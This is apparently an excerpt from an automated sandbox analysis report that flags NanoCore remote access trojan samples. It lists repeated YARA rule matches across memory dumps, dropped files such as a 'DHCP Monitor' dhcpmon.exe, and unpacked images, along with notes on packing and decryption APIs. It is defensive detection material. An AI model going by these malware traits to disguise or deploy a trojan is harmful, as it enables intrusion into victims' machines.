Source: 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000002.375251510.0000000003201000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000004.00000002.600475304.0000000004A60000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000004.00000002.600475304.0000000004A60000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000004.00000002.600839165.0000000004F70000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000004.00000002.600839165.0000000004F70000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000007.00000002.374117540.0000000000C42000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.374117540.0000000000C42000.00000002.00020000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000001.00000003.326079423.0000016C173D1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000001.00000003.326079423.0000016C173D1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000001.00000003.326100601.0000016C165FC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000001.00000003.326100601.0000016C165FC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000002.375293411.0000000004201000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000000.355766753.0000000000C42000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000000.355766753.0000000000C42000.00000002.00020000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000004.00000000.330048475.0000000000042000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000004.00000000.330048475.0000000000042000.00000002.00020000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000004.00000002.599666904.000000000381A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: fi.exe PID: 6616, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: fi.exe PID: 6616, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: dhcpmon.exe PID: 6952, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: dhcpmon.exe PID: 6952, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: C:\Users\user\AppData\Local\Temp\fi.exe, type: DROPPED	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: C:\Users\user\AppData\Local\Temp\fi.exe, type: DROPPED	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Local\Temp\fi.exe, type: DROPPED	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.dhcpmon.exe.424e434.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.dhcpmon.exe.424e434.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.wscript.exe.16c170d0090.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.2.wscript.exe.16c170d0090.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.wscript.exe.16c170d0090.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.2.fi.exe.4f70000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.fi.exe.4f70000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.0.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.0.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.0.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.2.fi.exe.382e434.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.fi.exe.382e434.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.fi.exe.38295fe.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.fi.exe.38295fe.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.fi.exe.38295fe.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.2.fi.exe.4a60000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.fi.exe.4a60000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.fi.exe.382e434.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.fi.exe.382e434.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.dhcpmon.exe.424e434.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.dhcpmon.exe.424e434.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.dhcpmon.exe.4252a5d.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.dhcpmon.exe.4252a5d.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.fi.exe.3832a5d.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.fi.exe.3832a5d.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.dhcpmon.exe.42495fe.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.dhcpmon.exe.42495fe.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.dhcpmon.exe.42495fe.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.2.fi.exe.4f70000.10.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.fi.exe.4f70000.10.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.dhcpmon.exe.3223dc4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.dhcpmon.exe.3223dc4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.0.fi.exe.40000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.0.fi.exe.40000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.0.fi.exe.40000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.2.fi.exe.4f74629.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.fi.exe.4f74629.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.fi.exe.27f1774.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.fi.exe.27f1774.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.2.fi.exe.40000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.fi.exe.40000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.fi.exe.40000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore

PE file has section (not .text) which is very likely to contain packed code (zlib compression ratio < 0.011)

Source: dhcpmon.exe.4.dr

Static PE information: Section: .rsrc ZLIB complexity 0.999787946429

.NET source code contains calls to encryption/decryption functions

Source: dhcpmon.exe.4.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: dhcpmon.exe.4.dr, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: dhcpmon.exe.4.dr, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
